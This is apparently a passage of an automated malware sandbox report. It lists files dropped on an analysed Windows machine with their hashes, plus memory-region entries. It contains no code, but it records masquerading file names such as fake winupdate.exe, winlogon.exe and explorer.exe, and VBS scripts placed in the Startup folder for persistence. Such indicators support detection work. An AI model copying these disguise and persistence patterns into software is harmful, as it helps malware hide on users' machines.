  SHA512: e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

• C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
  Filesize: 2.1MB
  MD5: ed2c8bb4eff7a646b544da1dfae70e05
  SHA1: f51e52aa2ae2cc74997b567bf9ce84d9eb351a79
  SHA256: 498bb94d257bbbf5a1b039c8168f5ce86e9b7fabc089cb6509b726ed5b557563
  SHA512: 86c3552aa223d8fd06c87d0075021e4a83e8e77199ad1e6538ce6052cb8e9ceaffbe074515c92c2842da25d478c33164f7a73d5015932f407f1c104749dcef71

• C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe
  Filesize: 63KB
  MD5: a5b1e5ca923df2568e09456390ff0ad8
  SHA1: 03b39ecd7d246a521fafd210d6be548fd1d337fd
  SHA256: 2246f52abfa3e125b7eb5831b40130fb1d4b6b2a274fef9b3b7aa854487b70a3
  SHA512: 7c286de35fd8899a2a43791e8a50436362a12f78b2582dcb72c75470a7ea50e3788d8ce4846de825501e929cf9a2e4ece4cd5d75f2627cd6ccf78cd91c2a885c

• C:\Users\Admin\AppData\Local\Temp\updateW\d709369490a2544d620ba0df857dadd0bb0d791c.key
  Filesize: 132B
  MD5: cc9ff4010b7de68a7328981e59618920
  SHA1: d709369490a2544d620ba0df857dadd0bb0d791c
  SHA256: b833c8c8433ea9967887502359228be622959ff2e5cf7286112d7a15b7b7eb24
  SHA512: e6053527ee46b281a43571519d46cf20f7909bf9f71097fda3489fdfd501f9928f3e3e4394673d91f3260d6fb4d906eb226fc7f87d5e279deb6af5ee140ae573

• C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
  Filesize: 323KB
  MD5: c28f5884742601af68f6254e1b1372b9
  SHA1: ab7472a2f56fca9f7f6e7519dea98eb06538e1ae
  SHA256: 1fbecefc4ef848e7c9ebd924c6fc11ffefdb0fa3bc87198b5062df09ab2faa1a
  SHA512: e2ea63226b2cdc4273c46591b600775503c2d927f6b7892a7f983692e0568eb500c5c278c17129c72a7c6195f63116c11428e5537d04b6878f1398906bdf33d5

• C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
  Filesize: 327KB
  MD5: 96314747c1f52485836c7eda570aa6e2
  SHA1: 98690473cd1e3740debc66322e1586fce1b228b0
  SHA256: 601bc48b0e84678055ae18a99d4e70f58373c436bd8b3c6669d4ba53a01d0ffc
  SHA512: eb636c9537f3d13f2fc54565334655262d15a063c220eae1b2dceed093e7f8da282bd206d9dba5243be0cf51886db948c91d5529148c0041d94c30a934ae5389

• C:\Users\Admin\AppData\Local\Temp\updateW\win.com
  Filesize: 2.0MB
  MD5: 93f47f76917294e7c1fc11ba690f12d7
  SHA1: 9895db1213530dac6b90ce61fdcd24020dea83a8
  SHA256: a0b16cc5fe93ac5c9c05d0de92cbfa97aaaceefbac036058677f60ee988804a6
  SHA512: 6e87151dc48a9e9ac21fec5f486a74dac8f695bdc95fe00c801e999f523800b0045c0dd219ba5e5ce75f768e654c35dcc5eae56898b4d8a3738941a69b797199

• C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
  Filesize: 37KB
  MD5: 379528dce8b0f2cc61ff99a3df2a9928
  SHA1: 58f6e48e29cea7de9abd7ae5b7c99abdaa2412e2
  SHA256: 874fa85adde3cc5b3cd0d7d932e28a0ec2a53d3b5566c8160772bde6d092c141
  SHA512: b7a0b90ed1163cb1bbd63ae2e4c6ea576d81286b307b3c11beb20ab1f8427a4da81b05a9c8da9b7af067d74f9af973549bc601bb07161538404425af4dffe940

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe

                                                                                                                      Filesize

                                                                                                                      47KB

                                                                                                                      MD5

                                                                                                                      eb9e4955edda276425933aea122f9a84

                                                                                                                      SHA1

                                                                                                                      6763106ffdc12cf213f579f72c1c6e8f3272fa9c

                                                                                                                      SHA256

                                                                                                                      75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

                                                                                                                      SHA512

                                                                                                                      621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat

                                                                                                                      Filesize

                                                                                                                      6KB

                                                                                                                      MD5

                                                                                                                      403d5dccab92622dd3d2bc70a95b2453

                                                                                                                      SHA1

                                                                                                                      e4cd9c7bf4493ba1f9184f3c3f46882931b891d9

                                                                                                                      SHA256

                                                                                                                      69728a0d54a5d95fb4693efac6f3873d22a2faa98a5b86cabc3a9e38675180f6

                                                                                                                      SHA512

                                                                                                                      9baf08ac4e0f104bbb8d1dddbf6dcddc728f044af8597ac4a2c6038c70ccf4ea79376a736737a5117b0aa85a01c04904da0e31843ca3d0e7eeb01c345cfe24e6

                                                                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs

                                                                                                                      Filesize

                                                                                                                      46KB

                                                                                                                      MD5

                                                                                                                      303b4e8b3434cc3377f3e2b6fb8d157a

                                                                                                                      SHA1

                                                                                                                      4fb5a2a44df5d4bf01693881040dc5117eadedab

                                                                                                                      SHA256

                                                                                                                      f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

                                                                                                                      SHA512

                                                                                                                      8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

                                                                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs

                                                                                                                      Filesize

                                                                                                                      43KB

                                                                                                                      MD5

                                                                                                                      dc64f4006ac8da132aac23cee3e22332

                                                                                                                      SHA1

                                                                                                                      f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

                                                                                                                      SHA256

                                                                                                                      7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

                                                                                                                      SHA512

                                                                                                                      538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

                                                                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe

                                                                                                                      Filesize

                                                                                                                      30KB

                                                                                                                      MD5

                                                                                                                      81b88e00b20c4fc25b4cc37c76183d25

                                                                                                                      SHA1

                                                                                                                      e49c1133657c6a37699e4a88702169218f0cb209

                                                                                                                      SHA256

                                                                                                                      267f30410791f5bb1b942a33daa6a66337758283c2f0710331be9430a380fd63

                                                                                                                      SHA512

                                                                                                                      055400816e0a29f45c80a6f5f5183a49985d9a9718e921967de85870f04e851372e96a51d630e47052c5046d5e17841eecba4e560ed72eeefb0ec75c09074e24

                                                                                                                    • C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe

                                                                                                                      Filesize

                                                                                                                      47KB

                                                                                                                      MD5

                                                                                                                      eb9e4955edda276425933aea122f9a84

                                                                                                                      SHA1

                                                                                                                      6763106ffdc12cf213f579f72c1c6e8f3272fa9c

                                                                                                                      SHA256

                                                                                                                      75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

                                                                                                                      SHA512

                                                                                                                      621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs

                                                                                                                      Filesize

                                                                                                                      46KB

                                                                                                                      MD5

                                                                                                                      303b4e8b3434cc3377f3e2b6fb8d157a

                                                                                                                      SHA1

                                                                                                                      4fb5a2a44df5d4bf01693881040dc5117eadedab

                                                                                                                      SHA256

                                                                                                                      f8e9d58f0eb6b1d398dc4532966ff7686956111f465a0777effc9b435ff0b4c5

                                                                                                                      SHA512

                                                                                                                      8e9c9c61f03dc3d62026923a75626bf70390453b2d58c43e22fab6a240676ab0cd7bd6268407256bb974baac20786e9529d01388d8faebbb520a26ec6f586e21

                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs

                                                                                                                      Filesize

                                                                                                                      43KB

                                                                                                                      MD5

                                                                                                                      dc64f4006ac8da132aac23cee3e22332

                                                                                                                      SHA1

                                                                                                                      f7ff2b567c1f5d76937d6cf6b6b45dcbeac3b393

                                                                                                                      SHA256

                                                                                                                      7b8b5acc0e36cde3a00177395f234b588b96ecb89e3c317d7e703c995463050f

                                                                                                                      SHA512

                                                                                                                      538c04d3b80a9beefc1f3b666ba705d34a85f8e52c91c4f3abf44a1d0101cbde0a4645c21bda4c02ef6a0d0355f0f1c38469a3600280c6bdfb614fb8365c3552

                                                                                                                    • C:\Windows (x86)\1xs.txt

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      4bef77593548c8ffbe1032d1e19fdbe1

                                                                                                                      SHA1

                                                                                                                      396ed9957651cd175dfe1a07274fcf97b8498c7b

                                                                                                                      SHA256

                                                                                                                      19c089eef95773db053e4296baa918ed3a4e98fed7ec96ea5dd796bf95b5f4c6

                                                                                                                      SHA512

                                                                                                                      661769875578c3e498b526f0541b6ab4f52d87b49e0b0688ac65b3c44f2bdf929bf810c0187c8cc39ab9a004d3e985dc0120f12c07e8cd646beedba93ea93546

                                                                                                                    • C:\Windows (x86)\3xs.txt

                                                                                                                      Filesize

                                                                                                                      938B

                                                                                                                      MD5

                                                                                                                      d80386f87dd89d45b52e57309bb3d967

                                                                                                                      SHA1

                                                                                                                      4b5df6a75c30a66d153b021518383d9e78d85c96

                                                                                                                      SHA256

                                                                                                                      0cb8999b0ac329d2f18a50a25344c8075f7e2eb472292f04bc099afef90166aa

                                                                                                                      SHA512

                                                                                                                      7fe22bc10555f6db611248418d04d47805970f04bddc05f6e40ab98a02b6f238292cf746ca1b48f575d5c511e5adaece68110d167bccc91aadda41772fe80096

                                                                                                                    • C:\Windows (x86)\AppxProvisioning.xml

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      85acfc76e1be21cd8602f85d1cf845ba

                                                                                                                      SHA1

                                                                                                                      f5507f6cf6e9b03ca06a69fffafede91d2799ef0

                                                                                                                      SHA256

                                                                                                                      29b4fc2e6b4814d13cea16ed9114e6cb764a1e92dbc1ed49ef834168b1e9cfb4

                                                                                                                      SHA512

                                                                                                                      e6c8b19d798c04ebfac501ed55bd5218f59e3780501ec200196f81d6f3d8069d1a43f3629932683c531dd3977b44e1a5e3f7c8e793b92c0797d4810150b4d068

                                                                                                                    • C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-black.png

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      705628497c0012302212a46add463e6e

                                                                                                                      SHA1

                                                                                                                      c1b0e1ed262832698d695d6893408f271a3832f1

                                                                                                                      SHA256

                                                                                                                      a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

                                                                                                                      SHA512

                                                                                                                      0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

                                                                                                                    • C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-high.png

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      f63c615733a3337bf2bea96c6ee9b568

                                                                                                                      SHA1

                                                                                                                      9c6122515da1d630ca04a303c4c296be6a696e14

                                                                                                                      SHA256

                                                                                                                      b0fda245579e57a9c613e1288c6b294c907a3b8e5bee32a72437a4fbfabc061c

                                                                                                                      SHA512

                                                                                                                      76c024e3a2bee36d308db5a71e5cd30410b25cdb55412d9ffe68f6c2ed83a6553ee9dca53e8996631b42b48b3ffd12470658e9645ec6a2270711cbb15561f897

                                                                                                                    • C:\Windows (x86)\BluetoothPairingSystemToastIcon.contrast-white.png

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      705628497c0012302212a46add463e6e

                                                                                                                      SHA1

                                                                                                                      c1b0e1ed262832698d695d6893408f271a3832f1

                                                                                                                      SHA256

                                                                                                                      a7a5c03e5ec4348e30060935d9041b4b58f34de2376da9155258684ed52a4865

                                                                                                                      SHA512

                                                                                                                      0a26cca53a35706eb8cd39fac7671e28b38dc3709968d3fc571ea37b2b9cff238c964567c3c7f769305dad410a5ff042ae30b76bfb8ebe96633993fbbbdf5ea2

                                                                                                                    • C:\Windows (x86)\BluetoothPairingSystemToastIcon.png

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      daf1dcb4aee839a1965f4cc160c49a53

                                                                                                                      SHA1

                                                                                                                      5830048cd318d13c2841998082c97fb579040904

                                                                                                                      SHA256

                                                                                                                      91d33ec5f008f2066b3a6658e1915b09a4fea2ed70e5260a0bd37c618c219fc1

                                                                                                                      SHA512

                                                                                                                      9b2af035dcf877eaca4ea5da053417fd8840d79abcff53e607bbd48f21cda85ae004f94325da44266653d23a255e85675100a41521b840c7bf282dde48bbd23e

                                                                                                                    • C:\Windows (x86)\DMAppsRes.dll

                                                                                                                      Filesize

                                                                                                                      2KB

                                                                                                                      MD5

                                                                                                                      373e36f2470ad6dd714bee7ce7406c03

                                                                                                                      SHA1

                                                                                                                      6f99d517470ad94c709b43d11a7182b4e28b0c47

                                                                                                                      SHA256

                                                                                                                      04ba799641106d47e995283c3b1d1196b1837025fafadafe4b983ecb98a089af

                                                                                                                      SHA512

                                                                                                                      82b0802423a1486c6dd77714ae468fe8327de39c6402c1927dddfca632ab7d27e2f65714fa25780cd51b528deaa38bf956b778a1b9e0e3adeab622a29c0ec725

                                                                                                                    • C:\Windows (x86)\DetailedReading-Default.xml

                                                                                                                      Filesize

                                                                                                                      3KB

                                                                                                                      MD5

                                                                                                                      4a6fa3c0efd237f104e09a22883d9388

                                                                                                                      SHA1

                                                                                                                      4fb30a39a11ef1115159b8585efeab4fc9ddaa91

                                                                                                                      SHA256

                                                                                                                      a75bcfa83c8e80720624646486daec8c1835fef2fef868b93e02a4c489287c7c

                                                                                                                      SHA512

                                                                                                                      489a0b94a34aa7068741a77c7f78319d582ed7ad15b077727b3c1af501056d67f12ba47007f78f07868690b83d10815ed5c83f641dc8c87ad99cb2fa1794df6d

• C:\Windows (x86)\FXSEVENT.dll
  Filesize: 8KB
  MD5: 306720d1bca22b93968b34459f047490
  SHA1: 0d84c6dfee0c079f809f8ff82f56ac3a0ca275e9
  SHA256: 2c010212274dce9fcfad0d17962577d5639cfdff3f4b875e3ed510de665cd171
  SHA512: dd69c3ca2e7e271f9fdd57bffb1893c679768669e44f26a69f2ea7640738c7b97eec6d8c7749f180ce59d3d248a6c4c921b6168b536aa5b89701ebc73c1a010d

• C:\Windows (x86)\Firewall.cpl
  Filesize: 7KB
  MD5: afd33f68fb822fb66861903ded9fb1c5
  SHA1: 1dd41a8f4ced7a6e49c79005ce634280adb5d207
  SHA256: a6a1c633c9bd4864349fe2b5939dcda0ad6e0d74679edfe6c0b19449c4efa3e7
  SHA512: c82f1a3f84fa689ff68c4db3eb431f711d054d74179483e7802cc119b86b95b8ddc3dd3ff374a513cb6017725eaa1d4adecbc1edb84989c9e4e8f581c4ef6012

• C:\Windows (x86)\aarun.vbs
  Filesize: 115B
  MD5: 29a3502c721319b896b4cf7aae0aaec5
  SHA1: de94cfb0214c0deddfbea191598bac33dce53bb9
  SHA256: a84a10c5ca727e766a5c25cf6f6f42b3dc3fd8760a5c8a755b77e1404c84b7a0
  SHA512: 7e791091dac79af2feb151e077ed5e991faec214ff6f857afbf882e2664fc26f044e49b218b422459e7319b1d899ad397be5b8ab9f0d036765a48cf461560cc8

• C:\Windows (x86)\advapi32res.dll
  Filesize: 2KB
  MD5: 1ba129902c8b7bed03c7cdc7867c736f
  SHA1: f2e5105d7a458aabeeb89df8c3bec343473bde99
  SHA256: 0e038b89882758458f234481adae1a67fb18c3255d963b1d9c969d0d395b44cb
  SHA512: d712189b1a2a54117ef062215a4db0edd306cf049f62666837fd527442060141c9d729bb5f616f1f43f5807bcdb6e5d4e946a4ad4a73c3d9dbb767013f12bd3d

• C:\Windows (x86)\asferror.dll
  Filesize: 2KB
  MD5: 7adeccbc25fc6c44822d1a3ca03d3bd9
  SHA1: 97d42ff16c83a0802fdfe35d4c2342ba31c532c7
  SHA256: 03475a7d63f2f2a09d74b6406890d40eb64432dcdc032d55b34f15abb5ca47d3
  SHA512: e1442c1fe9f3ceaedaca3f889ac20aa83e40147c3cb62314871f9e90de484949531fd53920093ab7451d28a01ce5d45c612b5a5b075ef7592803da798073f6d9

• C:\Windows (x86)\blbres.dll
  Filesize: 2KB
  MD5: e51330dff5b6d09076abcae74bdab37b
  SHA1: 9827b8ec15c7aa06341763a388ab11479412fc36
  SHA256: d386c4ad3223859578018d8012775021e315d2708f3d220106171d6836e6f4ad
  SHA512: 3eb9813c45f4fa0bda9a1bdf07456e9624679b101a0fcb47d5d37c23ffaf5f93afee2fa513f40c4aaedb7962811520e1b6fc0b994117378cb39d33480d909e68

• C:\Windows (x86)\bootstr.dll
  Filesize: 3KB
  MD5: 5c92bc8ae13ec449ca223e229bc86fdc
  SHA1: 2dbe40b89946f369634666fd105f94d2eea90d2c
  SHA256: 69c7f82badbd72ac5460bbc8f3f33aefb705e45591fc51a47a8264b616c8dd0b
  SHA512: 200a715824f77c642d7318c87ed9a5d80ccf802cf02556ab4e6c908e24b31de966e7d3ab57ab0a8c8a2043007252cee3a3a9851a3964da6b994ffcfc7008a788

• C:\Windows (x86)\bridgeres.dll
  Filesize: 2KB
  MD5: 557ec7fe5ddb6b0e2b88ec4706cb394a
  SHA1: 4288db3c285c6abe08011c9ec5c432795753e43b
  SHA256: 12f1cbbae3f347c9ac1fd9229eab1658f86f5fd3f3e8438c46b69cd0c68feee1
  SHA512: ea7936e56f6de188d8b35ed4cfedbae34d4e6cb5161eadb5234bbb4bae6c3bc946b111f9cef595c3e73e1f18b1e89c5a598407426766f3d3c30c9b3106be398e

• C:\Windows (x86)\defragres.dll
  Filesize: 4KB
  MD5: a8e3e8608e47101445aee826fee3f611
  SHA1: 197258ae69a536dc0f015779bde233a3e4d49859
  SHA256: 8c5af3b03fcc11bf17ded481bddbdfc0811077c7391b0d4ba616cc2ead47e80c
  SHA512: fbcfce2b040762de747da96460d6c648616054a8a004cb385cbf179981321339b254fa282fab171925f63ab4f9ef86724c595635db13b22521bfcbef8f9cc555

• C:\Windows (x86)\dmdskres2.dll
  Filesize: 2KB
  MD5: 00adb63b901732cb6ebcdb3b9d404945
  SHA1: 946088b565459987b96427e590fceb078a3a9688
  SHA256: e8a7eee20b9de1d981334011ac5550c44fb98a189a4ea24a6660c3efb314b51d
  SHA512: ada58be64f7cab2fcca27e753ca9b5f4fd2eec3e6ab705bc66ad33d009819a0e5fd5bda7ccb34151cf23a023c0dd89ce4b3bfb0696ab8135c9fd9002274717a2

• C:\Windows (x86)\dxmasf.dll
  Filesize: 7KB
  MD5: db18dedb3b5080ff23cfb17365f8f27a
  SHA1: ac2d2cf466cb8314f903599d385cdaa28f6ee2b1
  SHA256: 7a9ad21e76d3bd95d851752af9bc7e6e46a479994a12d51e8e62040fc06f61dd
  SHA512: 50e808b04a7d24b4326056cd6088ec1e2485057c2ee2102cf01093a1c8ed20929746d6c6ea19acc7ddb70b8243f46a46cef31dd1e49146db88d869227f4251d5

• C:\Windows (x86)\edgehtmlpluginpolicy.bin
  Filesize: 2KB
  MD5: 08c33e4ab904ec0960b0781ed26ae039
  SHA1: 120537ad8aa71fa3f818d940557f0a9ee1049938
  SHA256: b2803c9cca7abb72c72269b3ad0608f717574632bfea0cdb7145cdc93b7b3769
  SHA512: 137d22033fba7f72ef3c8c23771328ff4a3f67ece5f969e22c5f057f794c8d6af00e826f7b06ac10e15fc3600f151da2268f1342123b2f6a1701aedd10b477d3

• C:\Windows (x86)\explorer.exe
  Filesize: 5.1MB
  MD5: aa29dd540139be90fe02be76c6893534
  SHA1: 333faca54fc888198373cf5572df0ff092e38c9f
  SHA256: 3a8c7883f0f6bbd03c33ad762c232d84f92891930490c9d23b9556b90700d150
  SHA512: a88a5e272aa461d8a31a7cd831b74af2a7bba3c2e02b2ee1429f52069a0e25ca45bf576d490d8440deb81efe461693506742502efc94acc428740adf68ca4188

• C:\Windows (x86)\f3ahvoas.dll
  Filesize: 8KB
  MD5: bc244c0c43d633372aaa77aeff84c352
  SHA1: c547d5d6b1614efde458c67dbb0ccbd5f4877900
  SHA256: f3db39d0328a3c6c3226a352125a2f0f778982253afb1a171dcbce9924a30627
  SHA512: 0fcd0b0dffb369cd33c174dcc10959cf7a157e3c293911f7a705eb1117ae7ec31f79cfb4230c475a894f419f1f0f6c108e932ecf68746778c63d7f597b52952b

• C:\Windows (x86)\icmp.dll
  Filesize: 3KB
  MD5: 225f69152008527eaf2b8f44a48fb95e
  SHA1: ccb1d8b424a8061804b6421b94e3892f8cb7cd89
  SHA256: f0d008682013a54a20d169ba702b72f4c5d0d7c12de09ccdecf514b2928182f6
  SHA512: b8e10fa6f8e19f440f97454133c723265b492926c309f422eb720ba9c990790bad4e7e63fb27658bf2240de341ca71c5053f703eea286d9a08382e3c1620a3e8

• C:\Windows (x86)\ieuinit.inf
  Filesize: 3KB
  MD5: c1127463655f541956ff02a325996ecf
  SHA1: a43961de9c70bac7c807d679376083904f8c4d7d
  SHA256: 9437a11c86057ec560402db712cbafeebcfc5df8fe389105c65751ecf0d02abc
  SHA512: c0874025afbc94844f8354d2ab1e8c686eaca68df2c2e0690fe210e0f0df4e658c26121149111a60f747707c7f4e34d0e8f6a662b632c0bdc6e04d7ddfe60630

• C:\Windows (x86)\iglhxs64.vp
  Filesize: 4KB
  MD5: 8589ccd79af444175f0e91ac27c6343e
  SHA1: 2fe8411d582d22b0132b6cf10dec81547c7e4ff6
  SHA256: 2498331bf9ffe87bcbefb811512192866ac5db4d9f7f1826b071e10739964a9c
  SHA512: 1e70cb606d4d8e71c330988bc21b80ddd795bac697546c74458fdeb8bca53d690f680929395b9db82b4922b312d93f56edf0fa7dda6173fe144fea5d1e022734

• C:\Windows (x86)\iologmsg.dll
  Filesize: 2KB
  MD5: db13e4ffebd3b99066beaa509854b225
  SHA1: 6a7c6e2bb582a9aa9fd37db39fa170b3f8a19faa
  SHA256: 4d0f4c3e54126ea132930bc66f28f25c6e2be7df597f688b986c59bd0c787343
  SHA512: 49bedc1416cecce822fddebec6c1d28127fc1fbd15d9527d8a25d1767595940ac364ead9eceb05b204dfe3ad43c1329e334adcfcd67ad7bc8d1d235ac7c1ddfd

• C:\Windows (x86)\kanji_1.uce
  Filesize: 6KB
  MD5: 7c0c25f4ba1084c4abbeea2c74194c5f
  SHA1: 618b9958703b4c109a94a3630ab3f2baa364a8a3
  SHA256: 2373bf7e4f975d25fb3eabe004fbe138f9dba7ed6ffb9c967edc134d4d5956b7
  SHA512: 2d043ba789e30690d1591cce623e31910a9b8775de62ca173c6a2794174cde6837f5a9c8f646bc86d1fe838dcd4f6c33765e5d87337fb8b159c273152a933f7c

• C:\Windows (x86)\kanji_2.uce
  Filesize: 8KB
  MD5: 529bbd63519bbd654ef328454019693f
  SHA1: 77ff1ec7c3192dce109d15b3bc54013d102714a6
  SHA256: 32e4e19efb2f90bd439c6bba865563857d664fa6da87cb195e85ee97a0853bfc
  SHA512: eb82ac419003078503d9c7e9e826bbc9c56adf12d456a287e80c079d9991728aed49199318d63fda17596856c9294cdc9b8561e26efab941d4e046c68702bf70

                                                                                                                    • C:\Windows (x86)\kbd101.dll

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      MD5

                                                                                                                      8ffda05cf3f0c173ff428490de3b2d09

                                                                                                                      SHA1

                                                                                                                      229412646a8308acfc3f6afd1339ab8d0221bd1e

                                                                                                                      SHA256

                                                                                                                      48f620ed308217b745c4e2e4293690ebc5f2dc9369d892775365a66be4691ce8

                                                                                                                      SHA512

                                                                                                                      8bfb730f76ea555884309fa98240e1b1fb495e9cd6ed8b082eeca1ab1073d955170d6cea704840f84b4bf923bc74d1c57c6e19ba107e401af2adda6445458bbb

                                                                                                                    • C:\Windows (x86)\kbd101a.dll

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      6fdcf6e77171991dbb2f57ac4f17b508

                                                                                                                      SHA1

                                                                                                                      eeb923a7091f39d31dc47a3a26c4f8e297a2e723

                                                                                                                      SHA256

                                                                                                                      65ad0cb85dd0aea1da456809f1b4657286efe78f6229c7067ad4d27eb8dd3457

                                                                                                                      SHA512

                                                                                                                      5952e04b36e854d73bd3e89b99c9ae15c4d1c65891112d232b549bca8263f67e9800594a2368883eb104eba6bb243ecffdfc6e7470eafb79f37b59147ec43e16

                                                                                                                    • C:\Windows (x86)\kbd101b.dll

                                                                                                                      Filesize

                                                                                                                      7KB

                                                                                                                      MD5

                                                                                                                      cad4474377572619bdceff58076e2471

                                                                                                                      SHA1

                                                                                                                      bada002938f3cc40e758eae29f43e8de00942723

                                                                                                                      SHA256

                                                                                                                      293b7f6d7dfd283c80a2b9f70e460187e26b16a2c757cd93209d47cf7ad9fc71

                                                                                                                      SHA512

                                                                                                                      2e1f392c04cc8482e3a49be4c991d348436e133e01e920568753e6abe508cf1dceebd458d7c99fad6adba5048fd5f49ecc69219e7ba2686e3fae7c5787287c3a

                                                                                                                    • C:\Windows (x86)\xagal.bat

                                                                                                                      Filesize

                                                                                                                      759B

                                                                                                                      MD5

                                                                                                                      104470f3c1211668407c2519f44862f9

                                                                                                                      SHA1

                                                                                                                      58054e1f3ef8e70210fe362dd491a65231494fcb

                                                                                                                      SHA256

                                                                                                                      cd2c3436284a9e2e6505a01d73edad527e3094a7c7efc7890d476638924ed2bf

                                                                                                                      SHA512

                                                                                                                      aa1575f35d252f0a0c19599d87cd44483c3468873cd9f141e22214f22d9b321d227d9a3b027b923ea2a931896f5f7811eabf8f7ff2e7a9d869010049888848d7

                                                                                                                    • memory/220-284-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/220-287-0x000002B884650000-0x000002B884670000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-285-0x000002B884650000-0x000002B884670000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-288-0x000002B8846D0000-0x000002B8846F0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-286-0x000002B8846D0000-0x000002B8846F0000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/220-289-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1004-273-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-280-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-279-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1004-278-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-281-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-274-0x0000020099E50000-0x0000020099E70000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-277-0x0000020098440000-0x0000020098460000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1004-271-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1012-275-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/1012-276-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

                                                                                                                    • memory/1784-267-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/1784-268-0x0000027F11A10000-0x0000027F11A50000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      256KB

                                                                                                                    • memory/1784-266-0x0000027F11760000-0x0000027F11780000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      128KB

                                                                                                                    • memory/1784-265-0x00007FF7EDF60000-0x00007FF7EE728000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.8MB

                                                                                                                    • memory/2472-135-0x0000000140000000-0x0000000140023000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                    • memory/2472-152-0x0000000140000000-0x0000000140023000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      140KB

                                                                                                                    • memory/3476-272-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/3476-283-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      100KB

                                                                                                                    • memory/3620-190-0x00000000732F0000-0x00000000738A1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      5.7MB

